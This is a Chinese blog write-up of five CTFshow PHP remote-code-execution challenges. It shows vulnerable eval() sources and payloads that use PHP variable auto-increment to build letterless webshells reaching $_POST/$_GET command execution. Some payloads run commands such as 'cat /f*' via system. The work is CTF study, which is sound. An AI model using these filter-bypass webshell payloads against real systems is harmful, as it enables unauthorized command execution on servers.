CTFshow-RCE极限大挑战

最新推荐文章于 2024-10-24 22:32:26 发布
最新推荐文章于 2024-10-24 22:32:26 发布
阅读量2.5k 收藏 16
点赞数 1
CC 4.0 BY-SA版权
分类专栏: WP 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_63928796/article/details/127963079
本文详细解析了CTFshow平台上的五道远程代码执行(RCE)题目,包括源码分析、攻击思路及payload构造过程,展示了如何利用自增特性实现命令执行。

前言

ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。

RCE1

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","括号",$code);
$code = str_replace(".","点",$code);
eval($code);
?>

分析

可以看到我们最后执行的是eval,而过滤的只有( 和. ,而php eval函数的作用是把字符串按照PHP代码来计算,比如果我们写入 echo `1` 就会写入1 ,如果我们写入的是一句话木马,就可以成功植入木马,执行rce

payload

code=echo `$_POST[1]`;&1=cat /f*

RCE2

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

分析

基本把能用的都过滤了,只剩下$()_+;[],.=/字符,p神的文章好早之前就提出过,自增rce

一些不包含数字和字母的webshell | 离别歌

思路就是,我们rce需要字母,但字母都过滤了,所以我们就要想办法去构造字母,p神是用

强制连接数组和字符串,数组将被转换成字符串,其值为Array,而我们如果取Array的第[0]个字母的话就是A,而A++就是B,例如:

 之后我们可以用 . 把字母拼接起来,

payload

注释有分解。

$_=[].'';  //得到Array
$_=$_['/'=='+'];   //让[]里的值报错返回0,取Array[0]=A,此时$_=A
$____='_';   //让$____=_,后面容易拼接
$__=$_;   //将A赋给$__
$__++;$__++;$__++;$__++;$__++;$__++;  //A自增到G,此时$__=G
$____.=$__; //将_和G拼接起来,此时$____=_G
$__=$_;   //再将$__还原成A
$__++;$__++;$__++;$__++;  //A自增到E,此时__=E
$____.=$__;  //E和_G拼接,此时$____为_GE
$__=$_;  //再将__换源成A
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;  //A自增成T此时__=T
$____.=$__;  //再拼接成_GET,此时$____=_GET
$_=$____;   //为了方便起见,我们把____换成_
($$_[_])($$_[__]);  //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可

最后换成一行rce即可 

RCE3

源码

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 105) {
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

分析 

这个过滤和rce2差不多,但吧1和0给放出来了,也限制了长度<=105,可以看一下这个文章

BSides Noida CTF 2021 Web Calculate_bfengj的博客-优快云博客

得到NAN再用上面相同的方法获得N,从N开始构造的话长度就比上一个方法少多了,原理还是上一题的自增,试着构造一下,当我是想直接$a[0]的时候,他没有回显,原来是因为现在的NAN还不算字符串,所以后面要在拼接一个例如

就可以得到我们想要的N了,但我我们需要字母才能构造N,就用上一题同样的方法构造出A来,因为0可以用了,所以我们就不用让报错直接用[0]就可以了

然后我们就可以得到N了

之后再跟上一步一样一步一步自增就可以了

payload 

注释有解析。

$_=([].[])[0];    //得到Array
$_=($_/$_.$_)[0];   //__=N
$_++;  //O
$__=$_.$_++;  //拼接PO
$_++;$_++;$_++;  //S
$__.=$_;
$_++;  //T
$_=_.$__.$_;  //拼接_和POST
$$_[0]($$_[1]);  //$_POST[0]($_POST[1])

RCE4,RCE5

之后就是越来越少的长度,就直接分析一下师傅们的pyload

72位

<?php
$a=_(a/a)[a];//N
++$a;//O
$_=$a.$a++;//PO
$a++;$a++;//R
$_=_.$_.++$a.++$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])
%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f* 

 68位

$_=_(a/a)[_];//N
$a=++$_;//O
$$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]);//巧妙的把两次$_++放在一起
$a=_.++$_.$a[$_++/$_++].++$_.++$_//$a直接拼接出_POST $$a[_POST]($$a[_])//$_POST[_POST]($_POST[_]) 

 62位

<?PHP
$_=_(_._)[_];//N  //本地使用就用(_._._)[_]
$%FA=++$_;//O
$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);
//将拼接放到同一行,真的太厉害了,我只能感叹一句nb

 

ctfshow每周挑战RCE极限挑战
XiaoXiao_RenHe的专栏
04-10 1491
ctfshow RCE 极限挑战解析,反引号执行系统命令、数组自增传参、_/_非数字NAN自增传参、url编码。
CTF中PHP相关题目考点总结(二)
weixin_68789096的博客
06-24 1304
本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
ctfshow之web55~web57(无字母的rce
qq_1182418846的博客
08-31 1462
声明:本章内容是引荐几位师傅的博客,然后根据自己的理解编写而成。
ctfshow--RCE极限挑战
bossDDYY的博客
11-20 1997
使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST。phpinfo安装了一个扩展gettext,该扩展支持函数。,我们可以利用反引号执行命令 echo输出。我们跑一下 看看哪些字符没有被过滤。要保证构造payload长度小于。限制字符的自增 对于我来说较难。fuzz测试哪些字符没有被过滤。另外更有佬的payload。fuzz测试什么没有被过滤。限制传入的参数长度小于等于。fuzz测试,可用字符。构造的payload。
ctfshow RCE极限挑战
qq_44640313的博客
04-26 1176
无参数rce的绕过,重点是自增的方法的学习
ctfshow(41)--RCE/命令执行漏洞--或绕过
最新发布
m0_56019217的博客
10-24 660
的值与target中相应的字符串相同,就将两个url编码变量储存在res1和res2中,再跳出到最外层循环,继续运算下一个字符。这是因为16以下的十进制数字的十六进制形式都是一位数,而ASCII码中的符号的十六进制编码都是两位,不足两位的要在前面补零。中字符的索引,从第一个字符,即索引为0的字符开始,依次运算到最后一个字符,即。从0开始,到255为止,对应的是ASCII码中的256个编码的序号。是一个正则形式的字符串,储存的是题目过滤的字符。,即loop的值为false时,跳出该层循环。
【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 932
【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFSHOW_RCE极限挑战
v2ish1yan的博客
11-20 1178
CTFSHOWrce极限挑战
ctfshow 每周挑战 RCE极限挑战3
Altering_Ji的博客
05-29 674
ctfshow 每周挑战 RCE极限挑战3 payload有长度限制105,通过变量自增构造出POST,实现RCE
CTFshow-RCE极限挑战wp
Leaf_initial的博客
04-10 588
开始限制长度了,105字符,但是可以用数字0或者1,那么就可以通过(0/0)来构造float型的NAN,(1/0)来构造float型的INF,然后转换成字符串型,得到"NAN"和"INF"中的字符了,payload构造过程,这里直觉上认为构造。以及类似的东西都是变量名称,在构造payload的过程就就是起到一个变量名的作用,类似于$a、$b,在然后在php中,如果强制连接数组和字符串的话,数组将被转换成字符串,例如在下列代码中。于是利用这一点,我们可以得出Array中的第一个字母A,然后利用自增来得到。
ctfshow RCE极限挑战 wp
m0_64815693的博客
11-20 4531
ctfshow rce极限挑战 1-5 wp
ctfshow 每周挑战 RCE极限挑战4、5
Altering_Ji的博客
05-31 1972
ctfshow RCE极限挑战4和5 看过官方wp之后复现的,payload是自己后来写的,可能不如官方的看着清晰,但又很能碎碎念
CTFSHOW 每周挑战 RCE极限挑战
Jay17的博客
07-09 652
CTFSHOW 每周挑战 RCE极限挑战
CTFSHOW每周挑战——RCE
qq_61955196的博客
11-21 3318
ctfshow的每周挑战RCE的解题方法和一些问题的解决方法和个人总结。
RCE极限挑战
shinygod的博客
11-23 1210
RCE极限挑战
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值